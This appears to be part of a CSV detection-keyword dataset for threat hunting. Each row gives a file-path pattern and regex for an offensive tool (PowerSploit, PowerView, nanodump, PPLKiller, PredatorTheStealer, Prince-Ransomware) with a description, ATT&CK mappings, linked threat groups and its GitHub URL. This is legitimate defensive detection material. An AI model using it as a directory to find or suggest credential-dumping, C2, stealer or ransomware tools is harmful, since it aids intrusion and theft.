"*\PowerRat.exe*",".{0,1000}\\PowerRat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17380"
"*\PowerShdll.exe*",".{0,1000}\\PowerShdll\.exe.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","0","N/A","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","17381"
"*\PowershellKerberos*",".{0,1000}\\PowershellKerberos.{0,1000}","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","N/A","9","4","328","44","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z","17386"
"*\PowerShellRunnerDll.h*",".{0,1000}\\PowerShellRunnerDll\.h.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","0","N/A","N/A","6","5","487","113","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z","17387"
"*\Powershell-Scripts-for-Hackers-and-Pentesters*",".{0,1000}\\Powershell\-Scripts\-for\-Hackers\-and\-Pentesters.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","17388"
"*\PowerSploit*",".{0,1000}\\PowerSploit.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","17389"
"*\PowerTools.ps1*",".{0,1000}\\PowerTools\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","0","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","17394"
"*\PowerTools\PowerPick\*",".{0,1000}\\PowerTools\\PowerPick\\.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","17395"
"*\powerup.exe*",".{0,1000}\\powerup\.exe.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","17396"
"*\Powerup.exe*",".{0,1000}\\Powerup\.exe.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","N/A","7","2","195","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z","17397"
"*\PowerUp.ps1*",".{0,1000}\\PowerUp\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","17398"
"*\PowerUp.ps1*",".{0,1000}\\PowerUp\.ps1.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","17399"
"*\PowerUp.ps1*",".{0,1000}\\PowerUp\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","17400"
"*\PowerUp.ps1*",".{0,1000}\\PowerUp\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","17401"
"*\Powerup.ps1*",".{0,1000}\\Powerup\.ps1.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","17402"
"*\PowerUpSQL.ps1*",".{0,1000}\\PowerUpSQL\.ps1.{0,1000}","offensive_tool_keyword","PowerUpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Black Basta","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","PowerUpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","17403"
"*\PowerUpSQL.ps1*",".{0,1000}\\PowerUpSQL\.ps1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","PowerUpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","17404"
"*\PowerView.cna*",".{0,1000}\\PowerView\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","0","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","17405"
"*\PowerView.exe*",".{0,1000}\\PowerView\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","0","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","17406"
"*\Powerview.exe*",".{0,1000}\\Powerview\.exe.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","N/A","7","2","195","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z","17407"
"*\PowerView.Log*",".{0,1000}\\PowerView\.Log.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","17408"
"*\PowerView.Log*",".{0,1000}\\PowerView\.Log.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","PowerView","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","17409"
"*\PowerView.ps1*",".{0,1000}\\PowerView\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","0","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","17410"
"*\PowerView.ps1*",".{0,1000}\\PowerView\.ps1.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","17411"
"*\powerview.py*",".{0,1000}\\powerview\.py.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","N/A","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","17412"
"*\PowerView3.*",".{0,1000}\\PowerView3\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","0","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","17413"
"*\ppid_spoofing.exe*",".{0,1000}\\ppid_spoofing\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","17414"
"*\ppl_dump.*",".{0,1000}\\ppl_dump\..{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","17415"
"*\PPLBlade-main*",".{0,1000}\\PPLBlade\-main.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","17416"
"*\PPLFault*",".{0,1000}\\PPLFault.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","17417"
"*\PPLKiller*",".{0,1000}\\PPLKiller.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","N/A","10","10","933","139","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z","17418"
"*\PPLmedic.cpp*",".{0,1000}\\PPLmedic\.cpp.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","17419"
"*\PPLmedic.exe*",".{0,1000}\\PPLmedic\.exe.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","17420"
"*\PPLmedic\PPLmedic*",".{0,1000}\\PPLmedic\\PPLmedic.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","17421"
"*\pplsystem.exe*",".{0,1000}\\pplsystem\.exe.{0,1000}","offensive_tool_keyword","PPLSystem","creates a livedump of the machine through NtDebugSystemControl to extract the COM secret and context, to then inject inside this process.","T1003.002","TA0006","N/A","N/A","Credential Access","https://github.com/Slowerzs/PPLSystem","1","0","N/A","N/A","10","2","190","23","2024-05-29T18:33:35Z","2024-05-22T17:48:49Z","17422"
"*\PPLSystem-main*",".{0,1000}\\PPLSystem\-main.{0,1000}","offensive_tool_keyword","PPLSystem","creates a livedump of the machine through NtDebugSystemControl to extract the COM secret and context, to then inject inside this process.","T1003.002","TA0006","N/A","N/A","Credential Access","https://github.com/Slowerzs/PPLSystem","1","0","N/A","N/A","10","2","190","23","2024-05-29T18:33:35Z","2024-05-22T17:48:49Z","17423"
"*\Prasadhak.ps1*",".{0,1000}\\Prasadhak\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","17424"
"*\Pre2kSpray.ps1*",".{0,1000}\\Pre2kSpray\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Pre2kSpray","Enumerate domain machine accounts and perform pre2k password spraying.","T1087.002 - T1110.003","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/eversinc33/Invoke-Pre2kSpray","1","0","N/A","N/A","8","1","69","11","2023-07-14T06:50:22Z","2023-07-05T10:07:38Z","17425"
"*\PredatorTheStealer Dll.*",".{0,1000}\\PredatorTheStealer\sDll\..{0,1000}","offensive_tool_keyword","PredatorTheStealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006  - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/PredatorTheStealer","1","0","N/A","N/A","8","1","11","2","2022-12-06T16:46:33Z","2022-12-06T16:34:43Z","17426"
"*\PredatorTheStealer.*",".{0,1000}\\PredatorTheStealer\..{0,1000}","offensive_tool_keyword","PredatorTheStealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006  - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/PredatorTheStealer","1","0","N/A","N/A","8","1","11","2","2022-12-06T16:46:33Z","2022-12-06T16:34:43Z","17427"
"*\prefetch_leak.h*",".{0,1000}\\prefetch_leak\.h.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","0","N/A","N/A","8","1","90","10","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z","17444"
"*\prefetch_tool.sln*",".{0,1000}\\prefetch_tool\.sln.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","0","N/A","N/A","8","1","90","10","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z","17445"
"*\prefetch_tool.vcxproj*",".{0,1000}\\prefetch_tool\.vcxproj.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","0","N/A","N/A","8","1","90","10","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z","17446"
"*\pretender.exe*",".{0,1000}\\pretender\.exe.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","N/A","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","17447"
"*\pretender_Windows_x86_64.zip*",".{0,1000}\\pretender_Windows_x86_64\.zip.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","N/A","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","17448"
"*\Prince.v1.0.0.zip*",".{0,1000}\\Prince\.v1\.0\.0\.zip.{0,1000}","offensive_tool_keyword","Prince-Ransomware","Go ransomware utilising ChaCha20 and ECIES encryption.","T1486 - T1489 - T1027","TA0040 - TA0009 ","N/A","N/A","Ransomware","https://github.com/SecDbg/Prince-Ransomware","1","0","N/A","N/A","10","","N/A","","","","17449"
"*\Prince-Built.exe*",".{0,1000}\\Prince\-Built\.exe.{0,1000}","offensive_tool_keyword","Prince-Ransomware","Go ransomware utilising ChaCha20 and ECIES encryption.","T1486 - T1489 - T1027","TA0040 - TA0009 ","N/A","N/A","Ransomware","https://github.com/SecDbg/Prince-Ransomware","1","0","N/A","N/A","10","","N/A","","","","17450"
